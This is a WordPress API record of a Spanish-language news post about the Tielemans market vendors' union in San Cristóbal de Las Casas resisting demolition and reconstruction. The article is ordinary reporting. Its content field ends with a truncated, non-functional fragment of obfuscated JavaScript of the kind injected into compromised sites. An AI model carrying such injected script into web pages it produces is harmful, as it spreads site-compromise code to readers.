{"id":981,"date":"2022-03-31T03:17:59","date_gmt":"2022-03-31T03:17:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=981"},"modified":"2022-03-31T03:18:00","modified_gmt":"2022-03-31T03:18:00","slug":"locatarios-del-mercado-tielemans-dispuestos-a-afrontar-desalojo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=981","title":{"rendered":"Locatarios del Mercado Tielemans dispuestos a afrontar desalojo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-982\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-2.11.28-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- A unas horas que las autoridades federales determinen si se liberar\u00e1 el recurso para la reconstrucci\u00f3n del Mercado P\u00fablico Municipal \u201cJos\u00e9 Castillo Ti\u00e9lemans\u201d, la Uni\u00f3n Sindical de Locatarios (USLO) se siguen oponiendo a la obra y advirtieron que no temen ser desalojados por la fuerza p\u00fablica y continuar\u00e1n con sus recorridos para proteger el inmueble.<\/p>\n\n\n\n<p>En entrevista con Rosa Estrada, l\u00edder de USLO, se\u00f1al\u00f3 que han determinado hacer la limpieza del mercado para generar confianza entre la gente que asiste al centro de abasto a realizar sus compras, ya que todo se encuentra tranquilo pues han expulsado del mercado a Narciso Ruiz S\u00e1ntiz y a los integrantes de la Almetrach, que eran quienes causaban conflicto.<\/p>\n\n\n\n<p>\u201cNo queremos la reconstrucci\u00f3n, no queremos demuelan el mercado, ya hemos dicho que no y no, pero el se\u00f1or presidente dice que s\u00ed lo va hacer, no toma en cuenta a los que estamos aqu\u00ed d\u00eda a d\u00eda, somos los locatarios, los independientes y la uni\u00f3n sindical, no creo lo vaya hacer porque ya dijimos no, aunque haya \u00f3rdenes de aprehensi\u00f3n, lo aceptamos, porque no hemos hecho nada, no sabemos de qu\u00e9 nos van acusar\u201d.<\/p>\n\n\n\n<p>Rosa Estrada no se explica c\u00f3mo el presidente Mariano D\u00edaz Ochoa se sigue reuniendo con Narciso Ruiz, cuando ya no es nadie, \u201ces un delincuente, quiere vender espacios al precio que \u00e9l quiera para que est\u00e9 tranquilo, no se vale, la gente viene aqu\u00ed por su tortilla y sus frijoles, antes pod\u00edamos decir, vamos a guardar un poquito, pero ahora con esta situaci\u00f3n vamos al d\u00eda todos\u201d.<\/p>\n\n\n\n<p>\u201cNada m\u00e1s queremos remodelaci\u00f3n, que arreglen las l\u00e1minas y el drenaje, pero no quiere el presidente, primero nos dicen que la obra durar\u00e1 8 meses, luego un a\u00f1o, pero sabemos se va llevar m\u00e1s tiempo, en otros mercados se han tardado 5 o 6 a\u00f1os, entonces decimos que no. No tememos ser desalojados por la fuerza p\u00fablica porque no tenemos delito, \u00fanicamente no queremos la reconstrucci\u00f3n\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, advirti\u00f3 que van a seguir haciendo los recorridos de seguridad alrededor del inmueble, ya que temen sea incendiado o haya m\u00e1s provocaciones por parte de las autoridades, \u201cel Congreso del Estado no me ha contestado, pero ir\u00e9 en pr\u00f3ximos d\u00edas a ver qu\u00e9 respuesta me tienen\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- A unas horas que las autoridades federales determinen si se liberar\u00e1 el recurso para la reconstrucci\u00f3n del Mercado P\u00fablico Municipal \u201cJos\u00e9 Castillo Ti\u00e9lemans\u201d, la Uni\u00f3n Sindical de Locatarios (USLO) se siguen oponiendo a la obra y advirtieron que no temen ser desalojados por la fuerza p\u00fablica y continuar\u00e1n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":982,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-981","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=981"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/981\/revisions"}],"predecessor-version":[{"id":983,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/981\/revisions\/983"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/982"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=981"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=981"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}